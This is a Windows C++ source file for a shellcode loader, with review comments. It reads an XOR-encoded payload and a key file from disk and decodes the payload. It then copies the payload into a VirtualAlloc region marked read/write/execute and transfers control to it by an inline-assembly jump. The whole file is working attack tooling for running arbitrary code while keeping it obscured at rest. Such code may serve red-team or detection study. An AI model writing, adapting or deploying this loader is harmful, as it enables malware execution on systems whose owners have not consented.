#include <windows.h>
#include <iostream>
#include "../shared/crypto.hpp"
#include "../shared/futils.hpp"
// Compile-time switch for the "[+]" progress messages printed by main().
// The messages are guarded with #ifdef, so only the presence of the macro
// matters: changing the value to 0 leaves logging on; delete or comment out
// this line to silence it. The usage and allocation-failure messages are not
// guarded and are always printed.
#define VERBOSE 1
/// @brief Decodes a payload file with a key file and transfers control to it
///        inside the current process.
///
/// Expects exactly two arguments: argv[1] is the path of the XOR-encoded
/// shellcode, argv[2] the path of the XOR key file. The decoded bytes are
/// copied into a freshly allocated read/write/execute region and entered
/// with an indirect jump.
///
/// @param argc Argument count; anything other than 3 prints usage.
/// @param argv Argument vector as described above.
/// @return 1 on a wrong argument count or a failed allocation. The final
///         `return 0` sits behind a `jmp`, which pushes no return address,
///         so it is not reached by the payload returning normally.
///
/// NOTE(review): ReadFromFile and XorCipher come from the shared headers and
/// are not shown here; how they report a missing file or an empty key cannot
/// be confirmed from this file, and no result is checked before use.
int main(int argc, char **argv) {
    const bool haveBothPaths = (argc == 3);
    if (!haveBothPaths) {
        std::cout << "\nUsage: " << argv[0];
        std::cout << " <shellcode-path> <xor-keyfile-path>\n" << std::endl;
        return 1;
    }

#ifdef VERBOSE
    std::cout << "[+] Reading shellcode from " << argv[1] << std::endl;
#endif
    auto payload = ReadFromFile(argv[1]);

#ifdef VERBOSE
    std::cout << "[+] Reading XOR key from " << argv[2] << std::endl;
#endif
    auto xorKey = ReadFromFile(argv[2]);

#ifdef VERBOSE
    std::cout << "[+] XOR'ing shellcode" << std::endl;
#endif
    // The buffer is passed by pointer, so it is presumably transformed in
    // place. XOR with a key file only obscures the payload at rest; nothing
    // visible here authenticates the bytes before they are executed.
    XorCipher(&payload, xorKey);

    // A single private region that is readable, writable and executable at
    // once. NOTE(review): a PAGE_EXECUTE_READWRITE allocation that is written
    // and then jumped to is a pattern memory scanners and EDR telemetry
    // commonly key on.
    const auto payloadSize = payload.size();
    LPVOID execRegion = VirtualAlloc(nullptr, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execRegion == nullptr) {
        std::cout << "[!] Failed to allocate memory" << std::endl;
        return 1;
    }

#ifdef VERBOSE
    std::cout << "[+] Allocated " << payloadSize << " bytes at " << execRegion << std::endl;
#endif

    // Byte-wise copy of the decoded payload into the executable region.
    char *const destination = static_cast<char *>(execRegion);
    std::copy(payload.begin(), payload.end(), destination);

#ifdef VERBOSE
    std::cout << "[+] Copied shellcode to " << execRegion << std::endl;
    std::cout << "[+] Executing 'jmp " << execRegion << "'" << std::endl;
#endif

    // GCC/Clang extended asm in AT&T syntax (not accepted by MSVC): indirect
    // jump through a register holding the region's base address. std::endl
    // above has already flushed the log lines, since control does not come
    // back to this function's remaining code in the normal way.
    __asm__("jmp *%0" ::"r"(execRegion));

    return 0;
}